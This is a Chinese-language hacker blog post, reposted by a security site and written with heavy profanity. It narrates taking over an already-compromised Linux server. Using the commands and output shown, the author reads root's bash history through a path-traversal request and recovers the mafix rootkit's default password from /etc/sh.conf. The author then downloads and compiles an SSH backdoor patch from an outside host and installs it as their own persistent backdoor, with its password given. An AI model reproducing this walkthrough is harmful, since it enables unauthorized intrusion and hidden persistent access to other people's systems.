一次检测Rootkit的肉鸡

Yaseng 发了个包含给我  ROOT权限运行与HTTPD 如下图

傻逼 草拟吗的嫩B  什么J8管理员 ROOT权限的HTTPD? 这不明摆着找日吗? 草拟吗B的傻逼

打算破HASH  没CPU  GUP

好吧 这傻逼货 继续看  NAMP扫了下 我了个擦 貌似有个傻逼黑客装个后门

啃跌了 什么年代了 还用sshd v1  你特么不是丢人吗??  链接测试

  1. brk<~> $ ssh root@xxoo -1  # 22端口的SSH
  2. Protocol major versions differ: 1 vs. 2
  3. brk<~> $ ssh root@xxoo -p 2010 -1  # 2012端口的SSH  低级版本 怀疑后门
  4. root@xxoo’s password:

估计是mafix SSH backdoor   下载了围观下
http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz

看到SSHDIR=/lib/libsh.so   包含读了下 果然是这个后门

下面确定了 找密码吧~~

首先看ROOT的日志

  1. GET /sc8/photodownload?filepath=../../../../../../../../../../../root/.bash_history%00.html HTTP/1.1

读了下 找不到 估计被-c了  

分析ROOTKIT的源代码  看看密码如何处理的

  1. brk<~/Desktop/ddrk> $ head setup
  2. #!/bin/bash
  3. ##########define variables##########
  4. DEFPASS=123456
  5. DEFPORT=43958
  6. BASEDIR=pwd
  7. SSHDIR=/lib/libsh.so
  8. HOMEDIR=/usr/lib/libsh

变量是  DEFPASS
查找

  1. brk<~/Desktop/ddrk> $ cat setup | grep DEFPASS
  2. DEFPASS=123456
  3.    echo “No Password Specified, using default – $DEFPASS”
  4.    echo -n $DEFPASS|md5sum > /etc/sh.conf
  5. brk<~/Desktop/ddrk> $

村在了  /etc/sh.conf  MD5加密 读一下 果然出来了

你妈个BB 接着MD5 解密 。。。

成功登录

接下来  删除黑客的后门 留我自己的后门 如下  安装OPENSSH的吧。。

  1.   [root@SH-crew:/root]# ssh -v
  2. OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
  3. usage: ssh [-1246AaCfgkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]
  4.            [-D [bind_address:]port] [-e escape_char] [-F configfile]
  5.            [-i identity_file] [-L [bind_address:]port:host:hostport]
  6.            [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
  7.            [-R [bind_address:]port:host:hostport] [-S ctl_path]
  8.            [-w tunnel:tunnel] [user@]hostname [command]
  9. [root@SH-crew:/root]#

下载源代码。。

  1. [root@SH-crew:/root]# cd /tmp/
  2. [root@SH-crew:/tmp]# mkdir …
  3. [root@SH-crew:/tmp]# cd …
  4. [root@SH-crew:/tmp/…]# wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
  5. [root@SH-crew:/tmp/…]# tar xf openssh_4.3p2.orig.tar.gz
  6. [root@SH-crew:/tmp/…]# cd openssh-4.3p2/
  7. [root@SH-crew:/tmp/…/openssh-4.3p2]# wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch/sshbd5.5p1.diff
  8. [root@SH-crew:/tmp/…/openssh-4.3p2]# patch < sshbd5.5p1.diff
  9. patching file auth.c
  10. Hunk #1 succeeded at 243 (offset -28 lines).
  11. patching file auth-passwd.c
  12. Hunk #1 succeeded at 113 (offset -9 lines).
  13. patching file canohost.c
  14. Hunk #1 succeeded at 60 (offset -18 lines).
  15. patching file includes.h
  16. Hunk #1 succeeded at 211 (offset 39 lines).
  17. patching file sshconnect2.c
  18. Hunk #1 succeeded at 736 with fuzz 2 (offset -80 lines).
  19. patching file sshlogin.c
  20. Hunk #1 succeeded at 112 (offset -21 lines).
  21. [root@SH-crew:/tmp/…/openssh-4.3p2]#

接下来编辑了下密码  和SSH登录登出的记录文件 编译

  1. [root@SH-crew:/tmp/…/openssh-4.3p2]# ./configure –prefix=/usr –sysconfdir=/etc/ssh
  2. [root@SH-crew:/tmp/…/openssh-4.3p2]# make && make install

重启 退出 登录SSH

  1. [root@SH-crew:/tmp/…/openssh-4.3p2]# nano /etc/ssh/sshd_config
  2. [root@SH-crew:/tmp/…/openssh-4.3p2]# nano /etc/ssh/ssh_config
  3. [root@SH-crew:/tmp/…/openssh-4.3p2]# /etc/init.d/sshd restart
  4. [root@SH-crew:/tmp/…/openssh-4.3p2]exit

然后登录 22 输入后门密码Helenv5

把傻逼黑客的后门删除了 哈哈哈

  1. [root@viewjpkc libsh]# chmod -R 000 *
  2. [root@viewjpkc libsh.so]# chmod -R 000 *

吧端口封了

  1. [root@viewjpkc libsh]#  iptables -I INPUT -j DROP -p tcp –dport 2010
  2. [root@viewjpkc libsh]# iptables-save

测试链接

  1. brk<~/files/ssh> $ nc -vv xxxxxxxxxxx   2010
  2. Connection to xxoo 2010 port [tcp/search] succeeded!
  3. SSH-1.5-2.0.13
  4. ^C
  5. brk<~/files/ssh> $ nc -vv xxxxxx   2010

链接不了了

  1. [root@viewjpkc libsh]# modprobe -r ehci-hcd

最后 发张图。。。。

link:http://fuzzexp.org/check_rk.html

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。